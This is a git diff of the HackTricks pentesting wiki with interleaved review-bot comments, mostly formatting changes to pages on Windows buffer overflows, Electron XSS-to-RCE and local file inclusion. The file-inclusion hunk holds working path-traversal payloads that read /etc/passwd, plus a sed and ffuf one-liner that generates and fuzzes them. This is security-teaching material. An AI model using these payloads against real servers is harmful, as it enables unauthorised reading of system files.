diff --git a/.gitbook/assets/image (34) (1).png b/.gitbook/assets/image (34) (1).png new file mode 100644 index 00000000..9a275baa Binary files /dev/null and b/.gitbook/assets/image (34) (1).png differ diff --git a/.gitbook/assets/image (34).png b/.gitbook/assets/image (34).png index 9a275baa..2a984795 100644 Binary files a/.gitbook/assets/image (34).png and b/.gitbook/assets/image (34).png differ diff --git a/.gitbook/assets/image (35) (1).png b/.gitbook/assets/image (35) (1).png new file mode 100644 index 00000000..84735e38 Binary files /dev/null and b/.gitbook/assets/image (35) (1).png differ diff --git a/.gitbook/assets/image (35).png b/.gitbook/assets/image (35).png index 84735e38..2758b36d 100644 Binary files a/.gitbook/assets/image (35).png and b/.gitbook/assets/image (35).png differ diff --git a/.gitbook/assets/image (36) (1).png b/.gitbook/assets/image (36) (1).png new file mode 100644 index 00000000..ceb0a0f9 Binary files /dev/null and b/.gitbook/assets/image (36) (1).png differ diff --git a/.gitbook/assets/image (36).png b/.gitbook/assets/image (36).png index ceb0a0f9..625f447e 100644 Binary files a/.gitbook/assets/image (36).png and b/.gitbook/assets/image (36).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 625f447e..63d09319 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index 160a44b9..fb24d0eb 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -164,7 +164,7 @@ In this case you can see that **you shouldn't use the char 0x0A** (nothing is sa In this case you can see that **the char 0x0D is avoided**: -![](<../.gitbook/assets/image (34).png>) +![](<../.gitbook/assets/image (34) (1).png>) ## Find a JMP ESP as a return address 
@@ -182,7 +182,7 @@ You will **list the memory maps**. Search for some DLl that has: * **NXCompat: False** * **OS Dll: True** -![](<../.gitbook/assets/image (35).png>) +![](<../.gitbook/assets/image (35) (1).png>) Now, inside this memory you should find some JMP ESP bytes, to do that execute: @@ -193,7 +193,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute: **Then, if some address is found, choose one that don't contain any badchar:** -![](<../.gitbook/assets/image (36).png>) +![](<../.gitbook/assets/image (36) (1).png>) **In this case, for example: \_0x5f4a358f**\_ diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md index bdac3d06..c1167a58 100644 --- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md @@ -57,6 +57,10 @@ The desktop application might have access to the user’s device through Node AP * **`contextIsolation`** - is `on` by default. If on, main and renderer processes aren't isolated. * **`preload`** - empty by default. * [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform. +* Node Integration in Workers +* **`nodeIntegrationInSubframes`**- is `off` by default. + * If **`nodeIntregation`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application. + * If **`nodeIntregation`** is **disabled**, then preloads will load in the iframe Example of configuration: 
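Review bot: in exploiting/windows-exploiting-basic-guide-oscp-lvl.md the three image references (hunks @@ -164, @@ -182 and @@ -193) are repointed to `image (34) (1).png`, `image (35) (1).png` and `image (36) (1).png`, and the blob hashes show why: the new `(1)` files carry the old blobs (`00000000..9a275baa`, `00000000..84735e38`, `00000000..ceb0a0f9`) while the original names are overwritten with different content (`9a275baa..2a984795`, `84735e38..2758b36d`, `ceb0a0f9..625f447e`, and `image.png` `625f447e..63d09319`). This keeps the pictures on this page correct, but any other page still referencing `image (34).png`, `image (35).png`, `image (36).png` or `image.png` will now render a different picture, and no such markdown update is in this diff; grep the repo for those four paths before merging, or ask GitBook to stop re-numbering assets.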
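Review bot: in the hunk @@ -57 of network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md the two new sub-bullets misspell the option as `nodeIntregation` (twice), and the new bullet `* Node Integration in Workers` names no setting and no default; the option is `nodeIntegrationInWorker`, off by default, and should be written like its neighbours. The second sub-bullet ("If nodeIntegration is disabled, then preloads will load in the iframe") also ties preload loading to `nodeIntegration`, whereas the Electron docs describe `nodeIntegrationInSubFrames` itself as the switch that makes the preload run in every subframe (use `process.isMainFrame` inside the preload to tell them apart), with Node.js APIs in those frames additionally requiring `nodeIntegration`. Suggested wording: `* **nodeIntegrationInSubFrames** - off by default. When on, the preload script runs in every iframe and child window; if nodeIntegration is also on, those frames get Node.js APIs too.` While touching this list, the unchanged `contextIsolation` bullet says the opposite of what the flag does: with it on, the preload and Electron internals run in a separate JavaScript context from the page's scripts; it is not about main/renderer process isolation.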
@@ -75,7 +79,9 @@ const mainWindowOptions = { webPreferences: { blinkFeatures: 'EnumerateDevices,AudioOutputDevices', nodeIntegration: false, - contextIsolation: false + contextIsolation: false, + sandbox: false, + nodeIntegrationInSubFrames: false, preload: _path2.default.join(__dirname, 'mainScreenPreload.js'), nativeWindowOpen: true, enableRemoteModule: false, @@ -118,6 +124,8 @@ If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Nod ``` +
+ ## RCE: preload The script indicated in this setting is l**oaded before other scripts in the renderer**, so it has **unlimited access to Node APIs**: @@ -263,7 +271,7 @@ webContents.on("new-window", function (event, url, disposition, options) {} // o webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below) ``` -The call to \*\* `openInternally`\*\* will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**. +The call to **`openInternally`** will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**. In the case the **regex** used by the function is **vulnerable to bypasses** (for example by **not escaping the dots of subdomains**) an attacker could abuse the XSS to **open a new window which** will be located in the attackers infrastructure **asking for credentials** to the user: @@ -317,6 +325,7 @@ npm start * [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg) * [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) * More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) +* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
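Review bot: in the hunk @@ -75 the config example uses the documented camel-case key `nodeIntegrationInSubFrames: false`, while the options list added earlier in this file writes `nodeIntegrationInSubframes`; use the documented spelling in both places so a reader grepping an app's `webPreferences` matches what the docs and real code use. The new `sandbox: false` line also deserves a one-line comment in the example, since the list above presents `sandbox` as the option that restricts what Node can do and the example is now explicitly turning it off.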
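Review bot: in the hunk @@ -317 the new reference is a bare YouTube playlist URL (`...watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81`) while the entry just above it carries a description; add a short title saying what the talk covers, the same way the awesome-electronjs-hacking entry is labelled, so the list stays scannable and the link survives if the video is removed.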
diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index ef4123f8..6cad6731 100644 --- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md 
@@ -4,15 +4,11 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -62,18 +58,26 @@ location.reload();//Trigger the "exit" event ``` +## Example 2 + +Get **require object from prototype pollution**. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81) + +Leak: + +
+ +Exploit: + +
+
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
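Review bot: in the hunk @@ -4,15 of electron-contextisolation-rce-via-electron-internal-code.md the sponsor bullets are being rewritten from `-` to `*`, but the Twitter bird link is carried over still pointing at a malformed GitHub path (`https://github.com/carlospolop/hacktricks/tree/7af18b62.../\[https:/emojipedia.org/bird/README.md`); since these lines are being rewritten anyway, either point the emoji at https://emojipedia.org/bird/ or drop the emoji link and keep just `@carlospolopm`. The identical block at the bottom of the file (hunk @@ -62) carries the same link.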
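Review bot: in the hunk @@ -62,18 the new `## Example 2` section is a stub: `Leak:` and `Exploit:` are each followed only by an empty added line, so the page promises a way to get `require` through prototype pollution and shows nothing of it. Either add the leak and exploit payloads (or at least one sentence each on which property is polluted and how that reaches `require`), or hold the section until they exist; an empty heading is worse than none for readers searching this page. The playlist URL here should also get a title, as noted for the reference list in the README.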
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index 46faed34..92e5f934 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md @@ -12,7 +12,7 @@ -
+
Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\ This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\ 
@@ -112,31 +112,38 @@ http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd ### Identifying folders on a server Depending on the applicative code / allowed characters, it might be possible to recursively explore the file system by discovering folders and not just files. In order to do so: -- identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux): + +* identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux): + ``` http://example.com/index.php?page=../../../etc/passwd # depth of 3 -```` -- try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`: +``` + +* try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`: + ``` http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd ``` -- if the application is vulnerable, there might be two different outcomes to the request: - - if you get an error / no output, the `private` folder does not exist at this location - - if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory -- the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively. 
+* if the application is vulnerable, there might be two different outcomes to the request: + * if you get an error / no output, the `private` folder does not exist at this location + * if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory +* the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively. It is possible to adapt this technique to find directories at any location in the file system. For instance, if, under the same hypothesis (current directory at depth 3 of the file system) you want to check if `/var/www/` contains a `private` directory, use the following payload: + ``` http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd ``` The following sequence of commands allows the generation of payloads using `sed` (1) as input for url fuzzing tools such as `ffuf` (2): + ``` $ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt $ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root" ``` -Of course, adapt there payloads to your needs in terms of depth / location / input directory list. + +Of course, adapt there payloads to your needs in terms of depth / location / input directory list. ### **Path truncation**
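Review bot: in the hunk @@ -112 of pentesting-web/file-inclusion/README.md the bullets are re-added with `*` but keep the typos of the removed `-` lines, so fix them in the same pass: "depth of you current directory" should read "your current directory", "succesfully" should read "successfully", "using this techniques" should read "using these techniques", and the re-added last line "Of course, adapt there payloads" should read "adapt these payloads". One practitioner caveat on the unchanged `ffuf` line: `-mr "root"` matches any response body containing the string root, so an error page or HTML that happens to mention "root" is reported as a hit; a stricter pattern such as `-mr "root:x:0:0"` (or `-mr "root:.*:0:0:"`) filters the directory guesses far more reliably. The change from the stray four-backtick fence to three backticks is correct and should stay.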